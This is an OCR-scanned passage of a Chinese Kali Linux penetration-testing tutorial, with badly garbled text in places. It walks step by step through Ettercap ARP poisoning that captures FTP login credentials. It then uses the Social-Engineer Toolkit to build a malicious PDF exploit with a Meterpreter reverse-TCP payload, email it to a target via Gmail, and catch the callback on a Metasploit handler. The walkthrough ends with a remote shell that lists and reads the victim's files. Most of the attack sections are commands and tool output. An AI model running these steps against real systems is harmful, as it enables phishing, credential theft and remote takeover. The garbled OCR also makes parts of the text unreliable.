实施 中 间 人 攻击 时 ， 人 下 面 以 常见 
ARP 其 骗 为 例 ， 分 别 介绍 一 下 ARP 欺 骗 原 理 。 


一 般 情况 下 ，ARP 其 骗 并 不 是 使 网 络 无 法 正常 通信 ， 而 是 通过 冒充 网 关 或 其 他 主机 
使 得 到 达 网 关 或 主机 的 数据 流通 过 攻击 主机 进行 转发 。 通 过 转发 流量 可 以 对 流量 进 
行 控 制 和 查看 ， 从 而 控制 流量 或 得 到 机 密 信 息 。ARP 欺 骗 主 机 的 流程 如 图 7.2 所 
"ho 


如 图 7.2 所 示 ， 当主 机 A 和 主机 B 之 问 通信 时 ， 如 果 主 机 人 A 在 自己 的 ARP 缓 存 表 中 没 
有 找到 主机 B 的 MAC 地 址 时 ， 主 机 A 将 会 向 整个 局 域 网 中 所 有 计算 机 发 送 ARP 广 
播 ， 广 播 后 整个 局 域 网 中 的 计算 机 都 收 到 了 该 数据 。 这 时 候 ， 主 机 C 响 应 主机 A， 说 
我 是 主机 B， 我 的 MAC 地 址 是 XX-XX-XX-XX-XX-XX， 主 机 A 收 到 地 址 后 就 会 重新 更 
新 自己 的 缓冲 表 。 当 主机 A 再 次 与 主机 B 通 信 时 ， 该 数据 将 被 转发 到 攻击 主机 (主机 
C) 上 ， 则 该 数据 流 会 经 过 主机 C 转 发 到 主机 B。 


EVLA RIEV B 的 流量 融 要 经 过 PC3 转 发 






EHLB 


我 是 主机 A 我 的 MAC 地 址 
iE XX-XX- XX-XX-XX-XX 
(主机 CC 的 MAC 地 址 ) 


我 是 主机 B ,我 的 MAC 地 址 | 
JEXX-XX-XX-XX-XX-XX 


(主机 C 的 MAC HEHE ) 


7.2 ARP 欺 骗 主机 
3. 中 间 人 攻击 


实现 中 间 人 攻击 分 为 两 个 阶段 。 第 一 是 通过 某 种 手段 去 攻击 一 台 计 算 机 ; 第 二 是 其 
骗 主 机 。 这 两 个 阶段 工作 工程 如 图 7.3 和 图 7.4 所 示 。 


一 阶段 : 





主机 人 主机 B( 攻 击 者 
图 7.3 ARP 注 入 攻击 


在 该 阶段 主机 B 通 过 ARP 注 入 攻击 的 方法 以 实现 ARP 欺 骗 ， 通 过 ARP 欺 骗 的 方法 控 
制 主机 人 A 与 其 他 主机 间 的 流量 及 机 密 人 和 信息。 


第 二 阶段 : 


在 第 一 个 阶段 攻击 成 功 后 ， 主 机 B 就 可 以 在 这 个 网 络 中 使 用 中 间 人 的 身份 ， 转 发 或 
查看 主机 A 和 其 他 主机 间 的 数据 流 ， 如 图 7.4 所 示 。 





请 求 | 
(Nig ARP MERX Ns. | 
Cw 主机 B (攻击 者 ) 






图 7.4 中 间 人 攻击 机 制 


(1) 在 这 个 局 域 网 中 当主 机 A 同 主机 C 发 送 请 求 ， 此 时 该 数据 将 被 发 送 到 主机 B 
上 。 


(2) 主机 A 发 送 给 主机 C 的 数据 流 将 会 经 主机 B 转 发 到 主机 C 上 。 


(3) 主机 C 收 到 数据 以 为 是 主机 A 下 接 发 送 的 。 此 时 主机 C 将 响应 主机 A 的 请 求 ， 同 
样 的 该 数据 流 将 会 被 主机 B 转 发 到 主机 A 上 。 


(4) 主机 A 收 到 响应 后 ， 将 登录 主机 C。 这 样 主机 A 登录 时 的 用 户 名 及 密码 ， 将 会 
被 主机 B 查 看 到 。 


使 用 Ettercap 工 具 实现 中 间 人 攻击 。 具 体操 作 步 骤 如 下 所 示 。 
(1) 启动 Ettercap 工 具 。 执 行 命令 如 下 所 示 : 


root@kali:~# ettercap -G 


执行 以 上 命令 后 ， 将 显示 如 图 7.5 所 示 的 界面 。 


ettercap 0.8.0 


File Soff Options f 





7.5 Ettercap 4 z/ A 


(2) 该 界面 是 Ettercap 工 具 的 初始 界面 。 接 下 来 通过 抓 包 的 方法 实现 中 间 人 攻击 。 
在 菜单 栏 中 依次 选择 Sniff|Unified sniffing 命 邻 或 按 下 Shift+U 组 合 键 ， 将 显示 如 
7.6 所 示 的 界面 。 


F 


ettercap 0.8.0 


File Options ? 


Unified sniffing... Shift--U 
Bridged sniffing.. Shift--B 
Set pcap filter.. -Se 
— NN | 


图 7.6 É IRER 
(3) 在 该 界面 单 击 Unified sniffing 人 命令 后 ， 将 显示 如 图 7.7 所 示 的 界面 。 


ettercap Input 


| Network interface : fetho v 


k 确定 (0) || 取消 (C) 





图 7.7 选择 接口 


(4) 在 该 界面 选择 网 络 接口 。 这 里 选择 eth0， 然 后 单 击 “确定 "按钮 ， 将 显示 如 图 
7.8 所 示 的 界面 。 


ettercap 0.8.0 - x 


Start Targets Hosts View Mitm Filters Logging Plugins ? 





33 plugins ^ 
42 protocol dissectors 
3/ ports monitored 

16074 mac vendor fingerprint 

1766 tcp OS fingerprint 

21842 known services 


E 7.8 启动 接口 界面 


(5) 启动 接口 后 ， 融 可 以 扫 拍 所 有 的 主机 了 。 在 菜单 栏 中 依次 选择 Hosts|Scan for 
hosts 命 邻 或 按 下 Ctrl+S 组 合 键 ， 如 图 7.9 所 示 。 


『 | | 7 
ettercap 0.8.0 = | |. 





Start Targets |... | View Mitm Filters Logging Plugins ? 


Hosts list H 
Scan for hosts Ctrl--S 
Load from file... Ctri+0 


Save to file... Ctri+5 
+4 Åre La & Aa 


图 7.9 和 启动 扫 摘 主机 
(6) 在 该 界面 单 击 Scan for hosts 命 今后 ， 将 显示 如 图 7.10 所 示 的 界面 。 


ettercap 0.8.0 


Start Targets Hosts View Mitm Filters Logging Plugins ? 








\Privileges dropped to UID 65534 GID 65534... 


33 plugins 

42 protocol dissectors 

| 97 ports monitored 

[16074 mac vendor fingerprint 

[1766 tcp OS fingerprint 

[2182 known services 

IRandomizing 255 hosts for scanning... 

Se anning the whole netmask for 255 hosts 
|5 hosts added to the hosts list 


























图 7.10 打 描 主机 界面 

(7) 从 该 界面 输出 的 信息 可 以 看 到 共 扫 摘 到 五 台 主 机 。 如 果 要 查看 打 揪 到 主机 的 
信息 ， 在 菜单 栏 中 依次 选择 Hosts|Hosts list 命 邻 或 按 下 H 键 ， 如 图 7.11 所 示 。 
| ettercap 0.8.0 | | | 


"Hosts View Mitm Filters Logging Plugins ? 





Start Targets 





Hosts list H 
Oe 
Scan for hosts Ctri+$ 
Load from file..  Ctrl+0 ie M 
Save to file... Ctrl4-S 
dr FI * 


E 7.11 打开 主机 列表 
(8) 在 该 界面 单 击 Hosts list 命 分 后 ， 将 显示 如 图 7.12 所 示 的 界面 。 


ettercap 0.8.0 


Start Targets Hosts View Mitm Filters Logging Plugins ? 


a 


Host List M 


IP Address MAC Address Description 
192.168.41.1 00:50:56:C0:00:08 
192.168.41.2 . 00:50:56:ES:AF:47 
192.168.41.146 00:0C:29:48:66:40 
192.168.41.151 00:0C:29:50:FS:AE 
192.168.41.254 00:50:56:EE:5D:9E 
Delete Host Add to Target 1 Add to Target 2 





(«| 


33 plugins 

4 2 protocol dissectors 

57 ports monitored 
16074 mac vendor fingerprint 
1766 tcp OS fingerprint 
2182 known services 
Randomizing 255 hosts for scanning... 
scanning the whole netmask for 255 hosts... 
3 hosts added to the hosts list... 





7.12 扫 朱 到 的 所 有 主机 


(9) 该 界面 显示 了 扫描 到 的 五 台 主 机 的 IP 地 址 和 MAC 地 址 。 在 该 界面 选择 其 中 一 
台 主 机 ， 作 为 目标 系统 。 这 里 选择 192.168.41.151 主 机 ， 然 后 单 击 Add to Target 1 
按钮 。 添 加 目标 系统 后 开始 噢 探 数据 至 ， 在 菜单 栏 中 依次 选择 Start|Start sniffing 命 
分 或 按 下 Ctrl+W 组 合 键 ， 如 图 7.13 所 示 。 


ettercap 0.8.0 - | 





Targets Hosts View Mitm Filters Logging Plugins ? 
start sniffing Ctrl+W 


stop sniffing Ctrl+E 
'ess Description 


Exit Ctrl4- X CO:00:08 





E 7.13 开始 扫 摘 


(10) 启动 咖 探 后 ， 通 过 使 用 ARP 注 和 攻击 的 方法 获取 到 目标 系统 的 重要 信息 。 FB 
动 ARP 注 入 攻击 ， 在 菜单 栏 中 依次 选择 Mitm|Arp poisonig.…. 命 令 ， 如 图 7.14 所 示 。 
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ettercap 0.8.0 (ei a id x 


Start Targets Hosts View |.) Filters Logging Plugins ? 











Host List M Arp poisoning... 














| icmp redirect... 





























IP Address MAC Addres "n | 
- 一 | Ort stealing... -一 一 一 
192.168.41.1 00550560 pi. spoofing.. 
192.168.41.2 00:50:56:E9 | 





Cree see a Stop mitm attack(s) 





图 7.14 Arp 注 入 攻击 图 


(11) 单 击 Arp poisonig 人 命令 后 ， 将 显示 如 图 7.15 所 示 的 界面 。 在 该 界面 选择 攻击 
的 选项 ， 这 里 选择 Sniff remote connections。 然 后 单 击 “确定 "按钮 ， 将 显示 如 图 
7.16 所 示 的 界面 。 


MITM Attack: ARP Poisoning (于 nobody) 
"Optional parameters 


. MW! Sniff remote connections. 





LI Only poison one-way. 


























E 7.15 攻击 选项 
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ettercap 0.8.0 
Start Targets Hosts View Mitm Filters Logging Plugins ? 
| Host List M | 
IP Address MAC Address Description 
192.168.41.1 — 00:50:56:C0:00:08 
||192.168.41.2 . 00:50:56:E9:AF:47 
||192.168.41.146 00:0C:29:48:66:40 


192.168.41.151 00:0C:29:50:F9:AE 


||192.168.41.254 00:50:56:EE:5D:9E ~] 


Add to Target 1 | Add to Target 2 








Starting Unified sniffing... 
DH CP: [00:0C: 29:50:F9:AE] REQUEST 192.168.41.151 

DH CP: [192. 168.41. 254] ACK:192.168.41.151 255.255.255.0 GW 192.168.41.2 DNS 
192.168.41.2 "Localdomain" 

ARP poisoning victims: 


GROUP 1: 192.168.41.151 00:00: 29:50:F9:AE 


GROUP 2 : ANY (all the hosts in the list) 





E 7.16 攻击 界面 


(12) 此 时 ， 当 某 个 用 户 登 录 192.168.41.151 主 机 时 ， 它 的 敏感 信息 将 会 被 传递 给 
攻击 者 。 本 例 中 捕获 到 的 敏感 信息 如 图 7.17 所 示 。 


7.3 使 用 社会 工程 学 工具 包 (SET) 309 
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本 


ettercap 0.8.0 





Start Targets Hosts View Mitm Filters Logging Plugins ? 





Host List W | 


IP Address MAC Address Description 


















































192.168.41.1 — 00:50:56: C0: 00:08 
192.168.41.2 00:50: 56:E9:AF:47 
192.168.41.146 00:0C:29:48:66:40 





192.168.41.151 00:0C:29:50:F9:AE 


192.168.41.254 00:50:56:EE:5D:9E 
| E jl - E | 
| Delete Host | Add to Target 1 | Add to Target 2 | 


192.168.41.2 "Localdomain" 






LRP poisoning victims: 
GROUP 1: 192.168.41.151 00:0C: 29:50:F9:AE 


GROUP 2 : ANY (all the hosts in the list) 

FTP:192.168.41.151:21 -> USER: anonymous PASS: 123456 

DHCP: [00:0C:29:50:F9:AE] REQUEST 192.168.41.151 

DHCP: [192.168.41.254] ACK : 192.168.41.151 255.255.255.0 GW 192.168.41.2 DNS 
192.168.41.2 "Local domain" 























Ej 7.17 捕获 到 的 敏感 信息 


(13) 从 该 界面 可 以 看 到 ， 有 用 户 登 录 192.168.41.151 主 机 的 FTP 服 务 器 了 。 其 用 
户 名 为 anonymous， 密 码 为 123456。 获 取 这 些 信 息 后 停止 咖 探 ， 在 菜单 栏 中 依次 
单 击 StartlStop sniffing 命 令 ， 如 图 7.18 所 示 。 





ettercap 0.8.0 





= i| Targets Hosts View Mitm Filters Logging Plugins ? 
Start sniffing Ctrl+W 


Stop sniffing Ctrl+E | 
'ess Description 


Exit Ctrl4- X CO:00:08 





EJ 7.18 fE1EDRTE 


(14) SERRA, itzszedlbnng AJ. FRYE PER A t Mitm|Stop mitm 
attack(s) 命 分 ， 将 显示 如 图 7.19 所 示 的 界面 。 
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大 学 霸 Kali Linux 安全 渗透 教程 


(于 nobody) 
MITM attack(s) stopped 








图 7.19 停止 中 间 人 攻击 
(15) ERAS SAE EA, REM SP RAMEE. 


7.3 使 用 社会 工程 学 工具 包 (SET) 311 


7.4 使 用 SET 实施 攻击 


前 面 介 绍 了 社会 工程 学 工具 包 (SET) 的 简单 使 用 。 为 了 能 帮助 用 户 更 容易 的 理解 
社会 工程 学 的 强大 功能 。 本 节 将 介绍 使 用 社会 工程 学 工具 包 实 施 各 种 攻击 。 


7.4.1 针对 性 钓鱼 攻击 同 量 


针对 性 钓鱼 攻击 向 量 通 过 构造 特殊 文件 格式 的 漏洞 进行 渗透 攻击 ， 如 利用 Adobe 
Reader 8.1.0 (PDF 阅读 器 ) 的 漏洞 。 实 现 钓 鱼 攻 击 向 量 主要 通过 发 送 邮 件 附 件 的 
方式 ， 将 包含 渗透 代码 的 文件 发 送 到 目标 主机 。 当 目标 主机 的 用 户 打 开 邮 件 附 件 
时 ， 目 标 主 机 束 会 被 攻陷 和 控制 。 


SET 使 用 简单 邮件 管理 协议 (SMTP) 的 开放 代理 (匿名 的 或 者 需 认 证 的 ) Gmail 
和 Sendmail 来 发 送 邮件 。SET 同 时 也 使 用 标准 电子 邮件 和 基于 HTML 格 陈 的 电子 邮 
件 来 发 动 钓鱼 攻击 。 


【实例 7-1】 使 用 SET 实 现 钓 鱼 攻击 向 量 ， 本 例 中 通过 发 送 存 在 渗透 代码 的 PDF 格 式 
文件 到 目标 主机 。 具 体操 作 步 又 如 下 所 示 。 


(1) 启动 社会 工程 学 。 执 行 全 分 如 下 所 示 : 


root@kali:~# setoolkit 

[-] New set config.py file generated on: 2014-06-06 18:33:39.854805 
[-] Verifying configuration update... 

[*] Update verified, config timestamp is: 2014-06-06 18:33:39.854805 
[*] SET is using the new config, no need to restart 


= The Social-Engineer Toolkit (SET) [---] 
i Created by: David Kennedy (ReL1K) [---] 
d Version: 5.4.2 [一 | 


[ 
Follow us on Twitter: @TrustedSec [- 
Follow me on Twitter: @HackingDave [---] 
Homepage: https:/www.trustedsec.com [ 
Welcome to the Social-Engineer Toolkit (SET). 
The one stop shop for all of your SE needs. 
Join us on irc.freenode.net in channel #setoolkit 
The Social-Engineer Toolkit is a product of TrustedSec. 
Visit: https://www.trustedsec.com 
Select from the menu: HERES 


= 
- 
[---] Codename: "Walkers' 
[一 
f] 
[—] 


1) Social-Engineering Attacks 

2) Fast-Track Penetration Testing 

3) Third Party Modules 

4) Update the Metasploit Framework 
2) Update the Social-Engineer Toolkit 
6) Update SET configuration 

7) Help, Credits, and About 


99) Exit the Social-Engineer Toolkit 


set 


(2) 在 以 上 菜单 中 选择 社会 工程 学 ， 编 号 为 1， 如 下 所 示 : 


set> 1 
n In^ 
上 Ina 
ll Social-Engineer Toolkit ! \ 
I! I! 


! Free "n! 

! "o! 

! #hugs | 
! "n ! 

! By: TrustedSec "n j 

! Ij 
li MW 

\ 下 


| i 


foo00 0000 0000 oooo |! 
/o0o000000000000000000000/ | 
/oo0000000000000000000000/ / 


iC= if 
[---] The Social-Engineer Toolkit (SET) [---] 
[---] Created by: David Kennedy (ReL1K) [---] 
[---] Version: 5.4.2 [---] 
[---] Codename: ‘Walkers’ [---] 
[---] Follow us on Twitter: @TrustedSec [---] 
[---] Follow me on Twitter: @HackingDave [---] 
[---] Homepage: https://www.trustedsec.com [---] 


Welcome to the Social-Engineer Toolkit (SET). 
The one stop shop for all of your SE needs. 
Join us on irc.freenode.net in channel #setoolkit 
The Social-Engineer Toolkit is a product of TrustedSec. 
Visit: https://www.trustedsec.com 
Select from the menu: 
1) Spear-Phishing Attack Vectors 
2) Website Attack Vectors 
3) Infectious Media Generator 
4) Create a Payload and Listener 
5) Mass Mailer Attack 
6) Arduino-Based Attack Vector 
7) SMS Spoofing Attack Vector 
8) Wireless Access Point Attack Vector 
9) ORCode Generator Attack Vector 
10) Powershell Attack Vectors 
11) Third Party Modules 
99) Return back to the main menu. 
set> 


(3) 在 以 上 有 菜单 中 选择 攻击 类 型 。 这 里 选择 钓鱼 攻击 同 量 ， 编 号 为 1， 如 下 所 示 : 


Set> 1 
The Spearphishing module allows you to specially craft email mess: 
them to a large (or small) number of people with attached fileforr 
payloads. If you want to spoof your email address, be sure "Sendm: 
stalled (apt-get install sendmail) and change the config/set conf: 
flag to SENDMAIL=ON. 

There are two options, one is getting your feet wet and letting SE 
everything for you (option 1), the second is to create your own F: 
payload and use it in your own attack. Either way, good luck and t 

1) Perform a Mass Email Attack 

2) Create a FileFormat Payload 

3) Create a Social-Engineering Template 
99) Return to Main Menu 
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(4) 这 里 选择 大 规模 电子 邮件 攻击 ， 编 号 为 1， 如 下 所 示 : 





set:phishing>1 
Select the file format exploit you want. 
The default is the PDF embedded EXE. 
KKKKKKKKKK PAYLOADS 大 大 火炎 火炎 类 类 火炎 
1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 
2) SET Custom Written Document UNC LM SMB Capture Attack 
3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 
4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087 
5) Adobe Flash Player "Button" Remote Code Execution 
6) Adobe CoolType SING Table "uniqueName" Overflow 
7) Adobe Flash Player "newfunction" Invalid Pointer Use 
8) Adobe Collab.collectEmailInfo Buffer Overflow 
9) Adobe Collab.getIcon Buffer Overflow 
10) Adobe JBIG2Decode Memory Corruption Exploit 
11) Adobe PDF Embedded EXE Social Engineering 
12) Adobe util.printf() Buffer Overflow 
13) Custom EXE to VBA (sent via RAR) (RAR required) 
14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 
15) Adobe PDF Embedded EXE Social Engineering (NOJS) 
16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 
17) Apple QuickTime PICT PnSize Buffer Overflow 
18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 
19) Adobe Reader u3D Memory Corruption Vulnerability 
20) MSCOMCTL ActiveX Buffer Overflow (ms12-027) 
set:payloads»8 


| 
输出 的 信息 显示 了 钓鱼 攻击 同 量 中 可 以 使 用 的 文件 格式 ， 黑 认 是 PDF 格 陈 。 


(5) 这 里 利用 Abobe PDF 的 Collab.collectEmaillnfo 漏 洞 ， 所 以 选择 编号 8， 如 下 所 
7. 


1) Windows Reverse TCP Shell Spawn a command shell on victim 
and send back to attacker 


2) Windows Meterpreter Reverse TCP Spawn a meterpreter shell on 
victim and send back to attacker 

3) Windows Reverse VNC DLL spawn a VNC server on victim and 
send back to attacker 

4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, 


Reverse TCP Inline 
5) Windows Meterpreter Reverse TCP (X64) Connect back to the attacker 
(Windows x64), Meterpreter 


6) Windows Shell Bind TCP (X64) Execute payload and create an 
accepting port on remote system 
7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP 


using SSL and use Meterpreter 
以 上 信息 显示 了 攻击 的 方式 。 
(6) 这 里 选择 第 2 个 模块 ， 如 下 所 示 : 
set: payloads>2 
set» IP address for the payload listener:192.168.41.156 4ikiBX d 


set:payloads» Port to connect back on [443]:  # 设 置 攻 击 主 机 的 端口 号 
[-] Defaulting to port 443... 


[-] Generating fileformat exploit.. 

[*] Payload creation complete. 

[^] All payloads get sent to the /root/.set/template.pdf directory 
[-] As an added bonus, use the file-format creator in SET to create 


Right now the attachment will be imported with filename of'templ: 
whatever ' 

Do you want to rename the file? 

example Enter the new filename: moo. pdf 

1\. Keep the filename, I don't care. 

2\. Rename the file, I want to be cool. 


a] I | 2 


从 以 上 输出 信息 中 ， 可 以 看 到 攻击 载 傈 创建 完成 。 所 有 攻击 载 傈 保存 在 /root/.set/ 
中 ， 文 件 名 为 template.pdf。 


(7) 这 里 选择 是 否 重 命名 该 文件 。 这 里 使 用 默认 的 PDF 文 件 template.pdf， 输 入 编 
号 1， 如 下 所 示 : 





set: phishing>1 
[^] Keeping the filename and moving on. 
Social Engineer Toolkit Mass E-Mailer 
There are two options on the mass e-mailer, the first would 
be to send an email to one individual person. The second optior 
will allow you to import a list and send it to as many people : 
you want within that list. 
what do you want to do: 
1N. E-Mail Attack Single Email Address 
2N. E-Mail Attack Mass Mailer 


99\. Return to main menu. 





输出 信息 显示 了 邮件 攻击 的 方式 。 
(8) 这 里 选择 针对 单一 邮件 地 址 进行 攻击 ， 输 入 编号 1， 如 下 所 示 : 


set: phishing>1 
Do you want to use a predefined template or craft 
a one time email template. 
1N. Pre-Defined Template 
2N. One-Time Use Email Template 


俞 出 的 信息 提示 是 否 要 使 用 一 个 预先 定义 的 模块 。SET 人 允许 攻击 者 创建 不 同 的 模 
板 ， 并 且 在 使 用 时 支持 动态 导入 。 


(9) 这 里 使 用 预先 定义 的 模块 ， 输 入 编号 1， 如 下 所 示 : 


set:phishing>1 

[- ] Available templates: 

Have you seen this? 

2: How long has it been? 
3: Strange internet usage from your computer 
4: Status Report 
5: New Update 

6: Computer Issue 
7 

8 

9: 

1 


H 


: Dan Brown's Angels & Demons 
: Order Confirmation 


0: Baby Pics 


俞 出 的 信息 显示 了 所 有 可 用 的 模块 。 
(10) 这 里 选择 使 用 预先 定义 的 SET 邮件 模板 Status Report， 输 入 编号 4， 如 下 所 
ZN : 


set: phishing>4 

set:phishing> Send email to:********Q126.com  # 设 置 发 送 邮件 的 目的 地 址 
1\. Use a gmail Account for your email attack. 

2\. Use your own server or open relay 


4 EMEN 1 
输出 信息 显示 了 给 目标 主机 发 送 地 址 的 方法 。 
(11) 这 里 选择 使 用 Gmail 邮箱 账号 ， 输 入 编号 1， 如 下 所 示 : 


set: phishing>1 

set:phishing> Your gmail email address:***********@gmail.com # 输 入 G 
set:phishing» The FROM NAME user will see: 

Email password:  # 输 入 邮箱 密码 

set:phishing> Flag this message/s as high priority? [yes|no]:yes 
[*] SET has finished delivering the emails 

set:phishing> Setup a listener [yes|no]: 


4 79  . —— 
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给 输入 的 目的 邮件 地 址 (**@126.com) 发 送 恶 意 文 件 。 最 后 ， 提 示 是 否 设置 一 个 
监听 。 


(12) 这 里 设置 一 个 监听 ， 用 来 监听 攻击 载 何 反 弹 连 接 。 当 SET 启动 Metasploit 
时 ， 它 已 经 配置 了 所 有 必需 的 选项 ， 将 开始 处 理 攻 击 主机 的 IP 反 向 连接 到 443 端 
口 ， 如 下 所 示 : 


set:phishing» Setup a listener [yes|no]:yes 

[-] TT) 

[-] + WARNING: Database support has been disabled 
[-] xke 


# cowsayt++ 


< metasploit > 


i—i * 
Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro 
-- type 'go pro' to launch it now. 

=| metasploit v4.8.2-2014010101 [core:4.8 api: 1.0] 
+ -- --=[ 1246 exploits - 6/8 auxiliary - 198 post 
+ -- --=[ 324 payloads - 32 encoders - 8 nops 
[*] Processing /root/.set/meta config for ERB directives. 

resource (/root/.set/meta config)» use exploit/multi/handler 
resource (/root/.set/meta config)» set PAYLOAD windows/meterpreter/reverse tcp 
PAYLOAD => windows/meterpreter/reverse tcp 
resource (/root/.set/meta config)» set LHOST 192.168.41.156 
LHOST => 192.168.41.156 
resource (/root/.set/meta config)» set LPORT 443 
LPORT => 443 
resource (/root/.set/meta config)» set ENCODING shikata ga nai 
ENCODING => shikata ga nai 
resource (/root/.set/meta config)» set ExitOnSession false 
ExitOnSession => false 
resource (/root/.set/meta_config)> exploit -j 
[*] Exploit running as background job. 
msf exploit(handler) > 
[*] Started reverse handler on 192.168.41.156:443 
[*] Starting the payload handler... 
msf exploit(handler) > 


输出 的 信息 显示 了 监听 攻击 载 傈 的 信息 。 当 目标 主机 打开 发 送 的 恶意 邮件 时 ， 将 会 
自动 的 连接 到 攻击 主机 192.168.41.156:443。 


此 时 攻击 主机 可 以 将 前 面 创 建 的 template.pdf 文 件 ， 通 过 电子 邮件 发 送 给 目标 。 当 
目标 用 户 打 开 它 并 认为 是 合法 的 PDF 文 件 时 ， 此 时 目标 主机 被 立即 控制 。 在 攻击 主 
机 上 ， 将 看 到 如 下 所 示 的 信息 : 


msf exploit(handler) > 
[^] Sending stage (769024 bytes) to 192.168.41.146 
[*] Meterpreter session 1 opened (192.168.41.156:443 -> 192.168.41 


LEN  —  3^ado ^ — 


输出 的 信息 表示 ， 被 攻击 主机 的 地 址 是 192.168.41.146。 此 时 ， 攻 击 主机 与 目标 主 
机 成 功 的 建立 了 一 个 会 话 ， 如 下 所 示 : 


msf exploit(handler) > sessions 
Active sessions 





ld Type Information Connection 


1 meterpreter x86/win32 AA-BBGOKJM26FSWAYTest @ AA- 8860KJM26FSW 
192.168.41.156:443 -> 192.168.41.146:1083 (192.168.41.146) 


从 输出 的 信息 中 ， 可 以 看 到 有 一 个 会 话 。 该 会 话 中 ， 摘 述 了 目标 主机 的 相关 信息 。 
如 操作 系统 类 型 为 win32、 主 机 名 为 AA-886OKJM26FSW、 登 录 的 用 户 为 Test 及 主 
机 IP 地 址 。 激活 该 会 话 后 ， 就 可 以 在 目标 主机 上 进行 任何 操作 。 也 就 说 相当 于 控制 
了 目标 主机 。 激 活 会 话 ， 如 下 所 示 : 


msf exploit(handler) > sessions -i 1 
[*] Starting interaction with 11... 
meterpreter > 


从 输出 的 信 县 中 可 以 看 到 会 话 1 被 成 功 激活 。 此 时 就 可 以 在 meterpreter 命 令 行 下 ， 
执行 各 种 命令 。 如 登录 目标 主机 的 Shell， 如 下 所 示 : 


meterpreter > shell 

[-] Failed to spawn shell with thread impersonation. Retrying with: 
Process 792 created. 

Channel 2 created. 

Microsoft Windows XP [版 本 5.1.2600] 

(C) 版 权 所 有 1985-2001 Microsoft Corp. 

C:\Documents and SettingsNTest IBI» 





输出 信息 显示 为 C:\Documents and Settings\Test\ 桌 面 >， 表 示 成 功 登 录 到 目标 主 
机 。 此 时 相当 于 是 以 Test 用 户 的 身份 ， 在 目标 主机 中 进行 操作 。 查 看 当前 目录 中 的 


C:\Documents and SettingsNXTest\ 桌 面 >dir  # 列 出 目录 中 的 所 有 文件 
dir 

驱动 器 C 中 的 省 没有 标签 

耸 的 序列 号 是 1806-07F4 

C:\Documents and Settings\Test\ 桌 面 的 目录 

2014-06-07 11:11 <DIR> 

2014-06-07 11:11 <DIR> 


2014-05-06 19:46 o4 111.txt 
2014-06-07 11:00 57,364,480 AdbeRdr810 zh CN.msi 
2014-06-06 16:01 46,844 JEdB20ma7AEGV7G. pdf 
2014-06-06 18:54 6,619 template.pdf 
4 个 文件 57,417,997 字 节 
个 目录 38,359,552,000 JAF% 


输出 的 信息 显示 了 目标 主机 果 面 上 的 所 有 文件 及 目录 。 还 可 以 查看 文件 的 内 容 ， 如 
Tue: 


C:\Documents and Settings\Test\#mM>type 111.txt # 查 看 文件 内 容 
type 111.txt 
Ethernet adapter 本 地 连接 : 


Connection-specific DNS Suffix . : localdomain 

TP Addresse o cow hae Rmus bog. TAG 
Sübnet Mask s s eie o ocu me us 255 2557 250570 
Default Gateway . . . . . . . . . : 192.168.41.2 


输出 的 信息 显示 了 111.txt 文 件 的 内 容 。 


7.4.2 Web + 向量 


Web 攻 击 向 量 会 特意 构造 出 一 些 对 目标 而 言 是 可 信和 且 具 有 诱惑 力 的 网 页 。SET 中 的 
A, 看 起 来 和 网 页 完全 一 样 。 这 样 ， 
目标 用 户 以 为 自己 正在 访问 一 个 合法 的 站 点 ， 而 不 会 想到 是 被 攻击 。 本 小 节 将 介绍 
使 用 SET 实现 Web 攻 击 向 量 。 


【实例 7-2】 下 面 使 用 Java applet 攻 击 实现 Web 攻 击 向 量 。 具 体操 作 步 又 如 下 所 
Ro 


Java applet 攻 击 引 入 了 恶意 Java applet F ztfT 8 BETCBJx] W, 2512 5, TAtRapplet 
能 在 目标 浏览 器 中 正确 运行 ， Poet te ee A ip tL ie (TÓC dB. Java applet 
击 和 并 个 被 认为 是 Java 本 吴 的 漏洞 ， Re: 受 攻 击 目标 浏览 恶意 网 页 时 ， 网 页 会 弹出 
一 个 和 警告。 该 警告 信息 询问 是 否 需 要 运行 一 个 不 被 信任 的 Java applet 程 序 。 由 于 
Java 人 允许 用 户 对 一 个 apple 选 择 任意 名 字 进 行 签 名 ， 用 户 可 以 为 它 的 发 布 者 定义 为 
Google 和 Microsoft 等 。 这 样 ， 很 容易 使 一 些 人 遭受 攻击 。 


(1) 启动 社会 工程 学 。 执 行 从 全 如 下 所 示 : 


root@kali:~# setoolkit 
Select from the menu: 
1) Social-Engineering Attacks 
2) Fast-Track Penetration Testing 
3) Third Party Modules 
4) Update the Metasploit Framework 
5) Update the Social-Engineer Toolkit 
6) Update SET configuration 
7) Help, Credits, and About 
99) Exit the Social-Engineer Toolkit 


以 上 输出 信息 显示 了 所 有 的 攻击 菜单 列表 。 
(2) 这 里 选择 储 会 工程 学 攻击 ， 输 入 编号 1。 将 显示 如 下 所 示 的 信息 : 


set 1 
.M""bgd 7MM"""YMM MMP^"MM""YMM 
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[---] The Social-Engineer Toolkit (SET) [---] 
[---] Created by: David Kennedy (ReL1K) [---] 
[一 ] Version: 6.0 [一 ] 
[---] Codename: 'Rebellion' [---] 
E Follow us on Twitter: @TrustedSec [一 |] 
[I] Follow me on Twitter: @HackingDave [---] 
[---] Homepage: https-//www.trustedsec.com [---] 


Welcome to the Social-Engineer Toolkit (SET). 
The one stop shop for all of your SE needs. 
Join us on irc.freenode.net in channel #setoolkit 
The Social-Engineer Toolkit is a product of TrustedSec. 
Visit: https://www. trustedsec. com 
Select from the menu: 
1) Spear-Phishing Attack Vectors 
2) Website Attack Vectors 
3) Infectious Media Generator 
4) Create a Payload and Listener 
5) Mass Mailer Attack 
6) Arduino-Based Attack Vector 
7) SMS Spoofing Attack Vector 
8) Wireless Access Point Attack Vector 
9) ORCode Generator Attack Vector 
10) Powershell Attack Vectors 
11) Third Party Modules 
99) Return back to the main menu. 
sel» 


会 出 的 信息 显示 了 社会 工程 学 中 ， 可 使 用 的 攻击 列表 。 
(3) 这 里 选择 Web 攻 击 同 量 ， 输 入 编号 2。 将 显示 如 下 所 示 的 信息 : 


Set> 2 
The Web Attack module is a unique way of utilizing multiple web-ba: 
The Java Applet Attack method will spoof a Java Certificate and de. 
